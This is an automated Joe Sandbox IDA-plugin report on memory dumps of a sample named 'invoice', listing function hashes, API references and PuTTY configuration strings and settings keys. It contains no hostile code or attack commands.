Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _set_error_modestrchr
String ID: (Log file name can contain &Y, &M, &D for date, &T for time, &H for host name, and &P for port number)$(Use 1M for 1 megabyte, 1G for 1 gigabyte etc)$**MORE** processing$... in this many seconds$../config.c$1 (INSECURE)$6$Action to happen when a bell occurs:$Active$Add$Add key$Add new forwarded port:$Adjust how %s handles line drawing characters$Adjust the behaviour of the window title$Adjust the precise colours %s displays$Adjust the use of the cursor$Adjust the use of the mouse pointer$Adjust the window border$Algorithm selection policy:$All session output$Allow GSSAPI credential delegation$Allow agent forwarding$Allow attempted changes of username in SSH-2$Allow terminal to specify ANSI colours$Allow terminal to use 24-bit colours$Allow terminal to use xterm 256-colour mode$Always$Always append to the end of it$Always overwrite it$Answerback to ^E:$Application$Application keypad settings:$Apply$Ask the user every time$Assign copy/paste actions to clipboards$Attempt "keyboard-interactive" auth (SSH-2)$Attempt GSSAPI authentication (SSH-2 only)$Attempt GSSAPI key exchange$Attempt GSSAPI key exchange (SSH-2 only)$Attempt TIS or CryptoCard auth (SSH-1)$Attempt authentication using Pageant$Authentication methods$Authentication parameters$Auto$Auto wrap mode initially on$Auto-copy selected text to system clipboard$Auto-login username$BSD (commonplace)$Basic options for your %s session$Bell is temporarily disabled when over-used$Block$Blue$Both$Bypass authentication entirely (SSH-2 only)$Cancel$Change the sequences sent by:$Character classes:$Character set translation$Chokes on PuTTY's SSH-2 'winadj' requests$Chokes on SSH-1 RSA authentication$Chokes on SSH-1 ignore messages$Chokes on SSH-2 ignore messages$Classes of character that group together$Close window on exit:$Columns$Configure the appearance of %s's window$Configure the behaviour of %s's window$Configure the serial line$Connection$Connection type:$Connection/Data$Connection/Proxy$Connection/Rlogin$Connection/SSH$Connection/SSH/Auth$Connection/SSH/Auth/GSSAPI$Connection/SSH/Bugs$Connection/SSH/Cipher$Connection/SSH/Host keys$Connection/SSH/Kex$Connection/SSH/More bugs$Connection/SSH/TTY$Connection/SSH/Tunnels$Connection/SSH/X11$Connection/SUPDUP$Connection/Serial$Connection/Telnet$Consider proxying local host connections$Control pasting of text from clipboard to terminal$Control the bell overload behaviour$Control the scrollback in the window$Control use of mouse$Control-? (127)$Control-H$Copy and paste line drawing characters as lqqqk$Ctrl + Shift + {C,V}:$Cursor appearance:$Cursor blinks$DEC Origin Mode initially on$Data bits$Data to send to the server$Default selection mode (Alt+drag does the other one):$Delete$Destination$Detection of known bugs in SSH servers$Disable Arabic text shaping$Disable Nagle's algorithm (TCP_NODELAY option)$Disable application cursor keys mode$Disable application keypad mode$Disable bidirectional text display$Disable destructive backspace on server sending ^?$Disable remote-controlled character set configuration$Disable remote-controlled clearing of scrollback$Disable remote-controlled terminal resizing$Disable remote-controlled window title changing$Disable switching to alternate terminal screen$Disable xterm-style mouse reporting$Disconnect if authentication succeeds trivially$Display pre-authentication banner (SSH-2 only)$Display scrollbar$Do DNS name lookup at proxy end:$Don't allocate a pseudo-terminal$Don't start a shell or command at all$Downstream (connecting to the upstream PuTTY)$Dynamic$Dynamic Library Files (*.dll)$ESC[n~$Empty string$Enable TCP keepalives (SO_KEEPALIVE option)$Enable VT100 line drawing even in UTF-8 mode$Enable X11 forwarding$Enable blinking text$Enable compression$Enable legacy use of single-DES in SSH-2$Enabling and disabling advanced terminal features$Encryption cipher selection policy:$Encryption options$Environment variables$Exclude Hosts/IPs$Extended ASCII Character set:$Flow control$Flush log file frequently$Font settings$Font used in the terminal window$For selected mode, send:$Force off$Force on$Forwarded ports:$Further workarounds for SSH server bugs$Gap between text and window edge:$General options for colour usage$Green$HTTP$Handles SSH-2 key re-exchange badly$Handling of OLD_ENVIRON ambiguity:$Handling of line drawing characters:$Hide mouse pointer when typing in window$Host Name (or IP address)$Host key algorithm preference$Host keys or fingerprints to accept:$IPv4$IPv6$Ignores SSH-2 maximum packet size$Implicit CR in every LF$Implicit LF in every CR$Include header$Indicate bolded text by changing:$Initial state of cursor keys:$Initial state of numeric keypad:$Internet protocol version$Key$Key exchange algorithm options$Keyboard sends Telnet special commands$Line discipline options$Lines of scrollback$Linux$Load$Load, save or delete a stored session$Local$Local echo:$Local line editing:$Local ports accept connections from other hosts$Local username:$Location string$Log file name:$Logical name of remote host$Logical name of remote host (e.g. for SSH key lookup):$Logical name of remote host:$Login details$Low-level TCP connection options$MIT-Magic-Cookie-1$Make default system alert sound$Manually configure host keys for this connection$Max data before rekey (0 for no limit)$Max minutes before rekey (0 for no limit)$Minutes between GSS checks (0 for never)$Miscomputes SSH-2 HMAC keys$Miscomputes SSH-2 encryption keys$Misuses the session ID in SSH-2 PK auth$Modify$Mouse paste action:$NetHack$Never$None$None (bell disabled)$Normal$Nothing$Nothing on this panel may be reconfigured in mid-session; it is only here so that sub-panels of it can exist without looking strange.$Omit known password fields$Omit session data$Only on clean exit$Only supports pre-RFC4419 SSH-2 DH GEX$Only until session starts$Open$Options controlling %s's window$Options controlling GSSAPI authentication$Options controlling Rlogin connections$Options controlling SSH X11 forwarding$Options controlling SSH authentication$Options controlling SSH connections$Options controlling SSH encryption$Options controlling SSH host keys$Options controlling SSH key exchange$Options controlling SSH port forwarding$Options controlling SUPDUP connections$Options controlling Telnet connections$Options controlling character set translation$Options controlling copy and paste$Options controlling copying from terminal to clipboard$Options controlling key re-exchange$Options controlling local serial lines$Options controlling proxy usage$Options controlling session logging$Options controlling the connection$Options controlling the effects of keys$Options controlling the terminal bell$Options controlling the terminal emulation$Options controlling use of colours$Options specific to SSH packet logging$Other:$Over-use means this many bells...$Parity$Passive$Password$Permit control characters in pasted text$Permitted roles in a shared connection:$Poor man's line drawing (+, - and |)$Port$Port forwarding$Prefer algorithms for which a host key is known$Preference order for GSSAPI libraries:$Print proxy diagnostics in the terminal window$Printable output$Printer to send ANSI printer output to:$Private key file for authentication:$Prompt$Protocol options$Proxy hostname$Proxy type:$PuTTY Private Key Files (*.ppk)$Push erased text into scrollback$RFC 1408 (unusual)$RGB value:$Rectangular block$Red$Refuses all SSH-1 password camouflage$Remote$Remote X11 authentication protocol$Remote character set:$Remote command:$Remote ports do the same (SSH-2 only)$Remote terminal settings$Remote-controlled printing$Remove$Replies to requests on closed channels$Requires padding on SSH-2 RSA signatures$Reset scrollback on display activity$Reset scrollback on keypress$Response to remote title query (SECURITY):$Return key sends Telnet New Line instead of ^M$Rows$SCO$SOCKS 4$SOCKS 5$SSH packets$SSH packets and raw data$SSH protocol version:$Save$Save the current session settings$Saved Sessions$Seconds between keepalives (0 to turn off)$Seconds of silence required$Select a colour from the list, and then click the Modify button to change its appearance.$Select a colour to adjust:$Select a serial line$Select library file$Select private key file$Select session log file name$Sending of null packets to keep session active$Separate window and icon titles$Serial line to connect to$Session$Session logging:$Session/Logging$Set$Set the size of the window$Set the style of bell$Set to class$Set various terminal options$Share SSH connections if possible$Sharing an SSH connection between PuTTY tools$Shift overrides application's use of mouse$Source port$Specify the destination you want to connect to$Speed (baud)$Standard$Stop bits$Telnet command$Telnet negotiation mode:$Telnet protocol adjustments$Terminal$Terminal details$Terminal modes$Terminal modes to send:$Terminal scrolling$Terminal speeds$Terminal-type string$Terminal/Bell$Terminal/Features$Terminal/Keyboard$The Backspace key$The Function keys and keypad$The Home and End keys$The bell is re-enabled after a few seconds of silence.$The colour$The font$This:$Treat CJK ambiguous characters as wide$Underline$Upstream (connecting to the real server)$Use Unicode line drawing code points$Use background colour to erase screen$Use system username (%s)$User-supplied GSSAPI library path:$Username$VT100+$VT400$Value$Variable$Vertical line$Visual bell (flash window)$WAITS$Warn before closing window$What to do if the log file already exists:$When username is not specified:$Window$Window title$Window title:$Window/Appearance$Window/Behaviour$Window/Colours$Window/Selection$Window/Selection/Copy$Window/Translation$Workarounds for SSH server bugs$X display location$XDM-Authorization-1$Xterm R6$Yes$adjust$b$backends[c->radio.nbuttons]$backends[i]$basics$c->radio.nbuttons == 0$charclass$config-address-family$config-ansicolour$config-answerback$config-appcursor$config-appkeypad$config-autowrap$config-backspace$config-bellovl$config-bellstyle$config-blink$config-boldcolour$config-charclasses$config-charset$config-cjk-ambig-wide$config-closeonexit$config-colourcfg$config-command$config-crlf$config-cursor$config-decom$config-environ$config-erase$config-erasetoscrollback$config-features-altscreen$config-features-application$config-features-bidi$config-features-charset$config-features-clearscroll$config-features-dbackspace$config-features-mouse$config-features-qtitle$config-features-resize$config-features-retitle$config-features-shaping$config-font$config-funkeys$config-homeend$config-hostname$config-keepalive$config-lfcr$config-linedraw$config-linedrawpaste$config-localecho$config-localedit$config-logfileexists$config-logfilename$config-logflush$config-logging$config-logheader$config-loghost$config-logssh$config-mouseptr$config-mouseshift$config-nodelay$config-oldenviron$config-paste-ctrl-char$config-printing$config-proxy$config-proxy-auth$config-proxy-command$config-proxy-dns$config-proxy-exclude$config-proxy-logging$config-proxy-type$config-ptelnet$config-rectselect$config-rlogin-localuser$config-saving$config-scrollback$config-selection-autocopy$config-selection-clipactions$config-serial-databits$config-serial-flow$config-serial-line$config-serial-parity$config-serial-speed$config-serial-stopbits$config-ssh-agentfwd$config-ssh-auth-gssapi$config-ssh-auth-gssapi-delegation$config-ssh-auth-gssapi-libraries$config-ssh-banner$config-ssh-bug-chanreq$config-ssh-bug-derivekey2$config-ssh-bug-hmac2$config-ssh-bug-ignore1$config-ssh-bug-ignore2$config-ssh-bug-maxpkt2$config-ssh-bug-oldgex2$config-ssh-bug-pksessid2$config-ssh-bug-plainpw1$config-ssh-bug-rekey$config-ssh-bug-rsa1$config-ssh-bug-sig$config-ssh-bug-winadj$config-ssh-changeuser$config-ssh-comp$config-ssh-encryption$config-ssh-hostkey-order$config-ssh-kex-manual-hostkeys$config-ssh-kex-order$config-ssh-kex-rekey$config-ssh-ki$config-ssh-noauth$config-ssh-noshell$config-ssh-notrivialauth$config-ssh-portfwd$config-ssh-portfwd-address-family$config-ssh-portfwd-localhost$config-ssh-prefer-known-hostkeys$config-ssh-privkey$config-ssh-prot$config-ssh-pty$config-ssh-sharing$config-ssh-tis$config-ssh-tryagent$config-ssh-x11$config-ssh-x11auth$config-tcp-keepalives$config-telnetkey$config-telnetnl$config-termspeed$config-termtype$config-title$config-truecolour$config-ttymodes$config-username$config-username-from-env$config-utf8linedraw$config-warnonclose$config-winborder$config-winsize$config-xtermcolour$data$disclaimer$f$general$hostport$identity$ipversion$ldisc$main$mappings$n_ui_backends > 0 && n_ui_backends < PROTOCOL_LIMIT$otheropts$overload$params$protocol$r$repeat$rxvt$s$savedsessions$sercfg$serline$sshtty$supdup-ascii$supdup-location$supdup-more$supdup-scroll$tcp$term$trans$tweaks${Ctrl,Shift} + Ins:
API String ID: 383464575-1555272200
Opcode ID: 2ba0c2037d8d48c530c81419758a5470eecc31a8fcbb46a2d775b8a681e1ce37
Instruction ID: 48d1fdfb41a0ee4619a5d077d18f586a683b5c1f92113cc1bcc73618901ed307
Opcode Fuzzy Hash: 2ba0c2037d8d48c530c81419758a5470eecc31a8fcbb46a2d775b8a681e1ce37
Instruction Fuzzy Hash: BEA34F71A04A44D1E714ABA2F8593E977A5E785784F44023DE98E5BBAAEF3CC307C710

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD6FE0C Relevance: 263.0, Strings: 209, Instructions: 1738
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TerminalModes, xrefs: 000000013FD70175
ShadowBold, xrefs: 000000013FD71A03
ProxySOCKSVersion, xrefs: 000000013FD70339
Compression, xrefs: 000000013FD7053B
SunkenEdge, xrefs: 000000013FD70D9D
FontQuality, xrefs: 000000013FD7107D
ProxyTelnetCommand, xrefs: 000000013FD70436
SSH2DES, xrefs: 000000013FD7082B
SSHLogOmitData, xrefs: 000000013FD6FF56
BugDHGEx2, xrefs: 000000013FD70605
DisableArabicShaping, xrefs: 000000013FD70F9E
PreferKnownHostKeys, xrefs: 000000013FD70719
SerialFlowControl, xrefs: 000000013FD71B39
raw != NULL, xrefs: 000000013FD70653
38400,38400, xrefs: 000000013FD7014B
SUPDUPScrolling, xrefs: 000000013FD71C60
PingInterval, xrefs: 000000013FD70085
ConnectionSharingUpstream, xrefs: 000000013FD71BA3
WindowClass, xrefs: 000000013FD71B51
ScrollOnKey, xrefs: 000000013FD71533
ProxyDNS, xrefs: 000000013FD70267
SerialSpeed, xrefs: 000000013FD71ABC
ComposeKey, xrefs: 000000013FD70C61
RawCNP, xrefs: 000000013FD7123D
Beep, xrefs: 000000013FD70E14
BellOverloadN, xrefs: 000000013FD70E86
SSHLogOmitPasswords, xrefs: 000000013FD6FF39
connect %host %port\n, xrefs: 000000013FD7043D
BackspaceIsDelete, xrefs: 000000013FD70A0D
BugOldGex2, xrefs: 000000013FD718F9
MouseOverride, xrefs: 000000013FD712ED
UTF8Override, xrefs: 000000013FD71492
PortForwardings, xrefs: 000000013FD71695
AutoWrapMode, xrefs: 000000013FD70F47
SUPDUPLocation, xrefs: 000000013FD71BED
SshNoShell, xrefs: 000000013FD70971
BellOverload, xrefs: 000000013FD70E69
BellOverloadT, xrefs: 000000013FD70E9E
F, xrefs: 000000013FD71C58
ProxyLocalhost, xrefs: 000000013FD702C4
BugRSAPad2, xrefs: 000000013FD71825
AuthKI, xrefs: 000000013FD708BE
BellWaveFile, xrefs: 000000013FD70E49
NoMouseReporting, xrefs: 000000013FD70A9E
PassiveTelnet, xrefs: 000000013FD709F0
SshNoTrivialAuth, xrefs: 000000013FD70867
MousePaste, xrefs: 000000013FD713CF
CtrlShiftCV, xrefs: 000000013FD71424
WideBoldFont, xrefs: 000000013FD71A48
ScrollBar, xrefs: 000000013FD714F9
The Internet, xrefs: 000000013FD71BF4
RectSelect, xrefs: 000000013FD712B3
BugPlainPW1, xrefs: 000000013FD716E2
X11Display, xrefs: 000000013FD715F6
ConnectionSharingDownstream, xrefs: 000000013FD71BC0
X11Forward, xrefs: 000000013FD715E1
ScrollbarOnLeft, xrefs: 000000013FD719E6
BugMaxPkt2, xrefs: 000000013FD718C4
LineCodePage, xrefs: 000000013FD71439
ProxyType, xrefs: 000000013FD7030B
ChangeUsername, xrefs: 000000013FD70592
MouseIsXterm, xrefs: 000000013FD71296
AgentFwd, xrefs: 000000013FD70575
NoApplicationCursors, xrefs: 000000013FD70A81
UseSystemColours, xrefs: 000000013FD710BA
HideMousePtr, xrefs: 000000013FD70D80
CJKAmbigWide, xrefs: 000000013FD71475
UserNameFromEnvironment, xrefs: 000000013FD704D4
HostName, xrefs: 000000013FD6FE78
BugIgnore2, xrefs: 000000013FD7174C
Printer, xrefs: 000000013FD714A7
AuthGSSAPIKEX, xrefs: 000000013FD708F8
AltSpace, xrefs: 000000013FD70C27
LFImpliesCR, xrefs: 000000013FD70F64
StampUtmp, xrefs: 000000013FD719AC
BuggyMAC, xrefs: 000000013FD717BC
LocalEcho, xrefs: 000000013FD70CD5
LocalUserName, xrefs: 000000013FD704E9
RekeyBytes, xrefs: 000000013FD70774
TryPalette, xrefs: 000000013FD710D7
BoldAsColour, xrefs: 000000013FD71143
BugIgnore1, xrefs: 000000013FD716AD
ProxyHost, xrefs: 000000013FD70384
TermHeight, xrefs: 000000013FD71045
LogFileClash, xrefs: 000000013FD6FEDF
SerialStopHalfbits, xrefs: 000000013FD71AFC
CtrlShiftIns, xrefs: 000000013FD713FC
BCE, xrefs: 000000013FD715A7
PuTTY, xrefs: 000000013FD70D14
AlwaysOnTop, xrefs: 000000013FD70D46
ProxyPassword, xrefs: 000000013FD70409
GssapiFwd, xrefs: 000000013FD705AF
WarnOnClose, xrefs: 000000013FD70070
LockSize, xrefs: 000000013FD7158A
GSSCustom, xrefs: 000000013FD70951
NoRemoteClearScroll, xrefs: 000000013FD70B12
ecdh,dh-gex-sha1,dh-group14-sha1,rsa,WARN,dh-group1-sha1, xrefs: 000000013FD7062E
ecdh,dh-group14-sha1,rsa,WARN,dh-group1-sha1,dh-gex-sha1, xrefs: 000000013FD70627
LogType, xrefs: 000000013FD6FEC2
dh-gex-sha1,dh-group14-sha1,dh-group1-sha1,rsa,WARN, xrefs: 000000013FD7067F
NoRemoteResize, xrefs: 000000013FD70ABB
NoAltScreen, xrefs: 000000013FD70AD8
PublicKeyFile, xrefs: 000000013FD70986
NoApplicationKeys, xrefs: 000000013FD70A64
LocalEdit, xrefs: 000000013FD70CF5
NoRemoteWinTitle, xrefs: 000000013FD70AF5
ProxyPort, xrefs: 000000013FD703BD
TrueColour, xrefs: 000000013FD7112E
BlinkText, xrefs: 000000013FD715C4
ApplicationKeypad, xrefs: 000000013FD70BD0
CtrlAltKeys, xrefs: 000000013FD70C7E
DECOriginMode, xrefs: 000000013FD70F2A
RXVTHomeEnd, xrefs: 000000013FD70A2A
ANSIColour, xrefs: 000000013FD710F4
RemoteQTitleAction, xrefs: 000000013FD70B5C
AddressFamily, xrefs: 000000013FD6FFFE
NoPTY, xrefs: 000000013FD7051E
ScrollOnDisp, xrefs: 000000013FD71550
SerialDataBits, xrefs: 000000013FD71ADC
BeepInd, xrefs: 000000013FD70E34
dh-group14-sha1,dh-group1-sha1,rsa,WARN,dh-gex-sha1, xrefs: 000000013FD7066C
PasteRTF, xrefs: 000000013FD71279
TerminalType, xrefs: 000000013FD70113
RFCEnviron, xrefs: 000000013FD709D3
TryAgent, xrefs: 000000013FD70558
RekeyTime, xrefs: 000000013FD70736
BugWinadj, xrefs: 000000013FD7192E
ScrollBarFullScreen, xrefs: 000000013FD71516
PortNumber, xrefs: 000000013FD6FFDC
CRImpliesLF, xrefs: 000000013FD70F81
IUTF8, xrefs: 000000013FD7019F
WideFont, xrefs: 000000013FD71A30
AuthGSSAPI, xrefs: 000000013FD708DB
AltF4, xrefs: 000000013FD70C0A
SshBanner, xrefs: 000000013FD70884
FullScreenOnAltEnter, xrefs: 000000013FD70D63
LinuxFunctionKeys, xrefs: 000000013FD70A47
TelnetRet, xrefs: 000000013FD70CB8
Cipher, xrefs: 000000013FD705C4
ProxyLogToTerm, xrefs: 000000013FD7046F
LogHost, xrefs: 000000013FD707EA
NoDBackspace, xrefs: 000000013FD70B79
NetHackKeypad, xrefs: 000000013FD70BED
LogHeader, xrefs: 000000013FD6FF1C
RemoteCommand, xrefs: 000000013FD7099E
TCPKeepalives, xrefs: 000000013FD700FE
PingIntervalSecs, xrefs: 000000013FD700A6
MouseAutocopy, xrefs: 000000013FD713AA
X11AuthType, xrefs: 000000013FD7162B
NoRemoteQTitle, xrefs: 000000013FD70B27
FontVTMode, xrefs: 000000013FD7109A
SerialLine, xrefs: 000000013FD71A80
BugPKSessID2, xrefs: 000000013FD7185A
Wordness%d, xrefs: 000000013FD71316
BugChanReq, xrefs: 000000013FD71963
SshNoAuth, xrefs: 000000013FD7084A
BellOverloadS, xrefs: 000000013FD70ED0
proxy, xrefs: 000000013FD7038B
CloseOnExit, xrefs: 000000013FD70013
WinNameAlways, xrefs: 000000013FD70FD8
Protocol, xrefs: 000000013FD6FF6B
ScrollbackLines, xrefs: 000000013FD70F0A
ProxyExcludeList, xrefs: 000000013FD70231
%d,%d,%d, xrefs: 000000013FD711B7
TCPNoDelay, xrefs: 000000013FD700E1
SUPDUPMoreProcessing, xrefs: 000000013FD71C43
Colour%d, xrefs: 000000013FD7118A
ShadowBoldOffset, xrefs: 000000013FD71A68
../settings.c, xrefs: 000000013FD7065A
ConnectionSharing, xrefs: 000000013FD71B86
Xterm256Colour, xrefs: 000000013FD71111
RemotePortAcceptAll, xrefs: 000000013FD71680
SshProt, xrefs: 000000013FD707A5
BugHMAC2, xrefs: 000000013FD71781
X11AuthFile, xrefs: 000000013FD71643
SerialParity, xrefs: 000000013FD71B1C
BugDeriveKey2, xrefs: 000000013FD717F0
AltOnly, xrefs: 000000013FD70C44
LogFlush, xrefs: 000000013FD6FEFF
GSSLibs, xrefs: 000000013FD70913
NoRemoteCharset, xrefs: 000000013FD70B96
CapsLockCyr, xrefs: 000000013FD714DC
BugRSA1, xrefs: 000000013FD71717
LogFileName, xrefs: 000000013FD6FEA2
default, xrefs: 000000013FD6FF72
EraseToScrollback, xrefs: 000000013FD7156D
GssapiRekey, xrefs: 000000013FD70756
DisableBidi, xrefs: 000000013FD70FBB
TelnetKey, xrefs: 000000013FD70C9B
CurType, xrefs: 000000013FD70DDA
xterm, xrefs: 000000013FD7011A
ed25519,ecdsa,rsa,dsa,WARN, xrefs: 000000013FD706D7
TerminalSpeed, xrefs: 000000013FD70144
AuthTIS, xrefs: 000000013FD708A1
UTF8linedraw, xrefs: 000000013FD7125C
LoginShell, xrefs: 000000013FD719C9
ApplicationCursorKeys, xrefs: 000000013FD70BB3
LocalPortAcceptAll, xrefs: 000000013FD71663
BugRekey2, xrefs: 000000013FD7188F
SUPDUPCharset, xrefs: 000000013FD71C26
PasteControls, xrefs: 000000013FD712D0
TermWidth, xrefs: 000000013FD71025
SSHManualHostKeys, xrefs: 000000013FD71BD5
HostKey, xrefs: 000000013FD706D0
ProxyMethod, xrefs: 000000013FD702E1
WindowBorder, xrefs: 000000013FD70DBA
ProxyUsername, xrefs: 000000013FD703D5
Answerback, xrefs: 000000013FD70D0D
BlinkCur, xrefs: 000000013FD70DF7

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: strchr$QueryValue_set_error_mode
String ID: %d,%d,%d$../settings.c$38400,38400$ANSIColour$AddressFamily$AgentFwd$AltF4$AltOnly$AltSpace$AlwaysOnTop$Answerback$ApplicationCursorKeys$ApplicationKeypad$AuthGSSAPI$AuthGSSAPIKEX$AuthKI$AuthTIS$AutoWrapMode$BCE$BackspaceIsDelete$Beep$BeepInd$BellOverload$BellOverloadN$BellOverloadS$BellOverloadT$BellWaveFile$BlinkCur$BlinkText$BoldAsColour$BugChanReq$BugDHGEx2$BugDeriveKey2$BugHMAC2$BugIgnore1$BugIgnore2$BugMaxPkt2$BugOldGex2$BugPKSessID2$BugPlainPW1$BugRSA1$BugRSAPad2$BugRekey2$BugWinadj$BuggyMAC$CJKAmbigWide$CRImpliesLF$CapsLockCyr$ChangeUsername$Cipher$CloseOnExit$Colour%d$ComposeKey$Compression$ConnectionSharing$ConnectionSharingDownstream$ConnectionSharingUpstream$CtrlAltKeys$CtrlShiftCV$CtrlShiftIns$CurType$DECOriginMode$DisableArabicShaping$DisableBidi$EraseToScrollback$F$FontQuality$FontVTMode$FullScreenOnAltEnter$GSSCustom$GSSLibs$GssapiFwd$GssapiRekey$HideMousePtr$HostKey$HostName$IUTF8$LFImpliesCR$LineCodePage$LinuxFunctionKeys$LocalEcho$LocalEdit$LocalPortAcceptAll$LocalUserName$LockSize$LogFileClash$LogFileName$LogFlush$LogHeader$LogHost$LogType$LoginShell$MouseAutocopy$MouseIsXterm$MouseOverride$MousePaste$NetHackKeypad$NoAltScreen$NoApplicationCursors$NoApplicationKeys$NoDBackspace$NoMouseReporting$NoPTY$NoRemoteCharset$NoRemoteClearScroll$NoRemoteQTitle$NoRemoteResize$NoRemoteWinTitle$PassiveTelnet$PasteControls$PasteRTF$PingInterval$PingIntervalSecs$PortForwardings$PortNumber$PreferKnownHostKeys$Printer$Protocol$ProxyDNS$ProxyExcludeList$ProxyHost$ProxyLocalhost$ProxyLogToTerm$ProxyMethod$ProxyPassword$ProxyPort$ProxySOCKSVersion$ProxyTelnetCommand$ProxyType$ProxyUsername$PuTTY$PublicKeyFile$RFCEnviron$RXVTHomeEnd$RawCNP$RectSelect$RekeyBytes$RekeyTime$RemoteCommand$RemotePortAcceptAll$RemoteQTitleAction$SSH2DES$SSHLogOmitData$SSHLogOmitPasswords$SSHManualHostKeys$SUPDUPCharset$SUPDUPLocation$SUPDUPMoreProcessing$SUPDUPScrolling$ScrollBar$ScrollBarFullScreen$ScrollOnDisp$ScrollOnKey$ScrollbackLines$ScrollbarOnLeft$SerialDataBits$SerialFlowControl$SerialLine$SerialParity$SerialSpeed$SerialStopHalfbits$ShadowBold$ShadowBoldOffset$SshBanner$SshNoAuth$SshNoShell$SshNoTrivialAuth$SshProt$StampUtmp$SunkenEdge$TCPKeepalives$TCPNoDelay$TelnetKey$TelnetRet$TermHeight$TermWidth$TerminalModes$TerminalSpeed$TerminalType$The Internet$TrueColour$TryAgent$TryPalette$UTF8Override$UTF8linedraw$UseSystemColours$UserNameFromEnvironment$WarnOnClose$WideBoldFont$WideFont$WinNameAlways$WindowBorder$WindowClass$Wordness%d$X11AuthFile$X11AuthType$X11Display$X11Forward$Xterm256Colour$connect %host %port\n$default$dh-gex-sha1,dh-group14-sha1,dh-group1-sha1,rsa,WARN$dh-group14-sha1,dh-group1-sha1,rsa,WARN,dh-gex-sha1$ecdh,dh-gex-sha1,dh-group14-sha1,rsa,WARN,dh-group1-sha1$ecdh,dh-group14-sha1,rsa,WARN,dh-group1-sha1,dh-gex-sha1$ed25519,ecdsa,rsa,dsa,WARN$proxy$raw != NULL$xterm
API String ID: 1633091212-1236542979
Opcode ID: 79da706dac37087808fd137bbdd0a2a182c68e3a6f62738be7025dfcfa7ff3c7
Instruction ID: 083a1cac707fcd2a8ef3fe9c73e57abb9d216008491dae648ab6a8a9dc45175c
Opcode Fuzzy Hash: 79da706dac37087808fd137bbdd0a2a182c68e3a6f62738be7025dfcfa7ff3c7
Instruction Fuzzy Hash: 13F28075B1469085FB14EF93E8297DA2351A785FC8F815139AC490BBAADF7CC30B9B04

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDC9DC7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83
librarystringloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(?,?,?,?,?,?,000000013FDCD92C,?,?,?,000000013FDCDA99), ref: 000000013FDC9E18
strchr.LIBVCRUNTIME ref: 000000013FDC9E7E
GetUserNameA.ADVAPI32 ref: 000000013FDC9EA2
GetUserNameA.ADVAPI32 ref: 000000013FDC9ED7

Strings

sspicli.dll, xrefs: 000000013FDC9DFD
GetUserNameExA, xrefs: 000000013FDC9E0E
secur32.dll, xrefs: 000000013FDC9DEE

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: NameUser$AddressProcstrchr
String ID: GetUserNameExA$secur32.dll$sspicli.dll
API String ID: 3929478627-676772081
Opcode ID: 5387cbef3acb0031cdc49ab887ebbac4dd09ac9cebb00629a97070c60f42fe3b
Instruction ID: bd5185917878c9aa2ddd88666b204eda5f6307a99fd028ed6e8f8ba2cf0fc234
Opcode Fuzzy Hash: 5387cbef3acb0031cdc49ab887ebbac4dd09ac9cebb00629a97070c60f42fe3b
Instruction Fuzzy Hash: 1B31E130A0665056FB60AB61D8983EA2790A785B80F81813DDD0B1BBE5DF3DCB43C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDB31C0 Relevance: .5, Instructions: 491COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
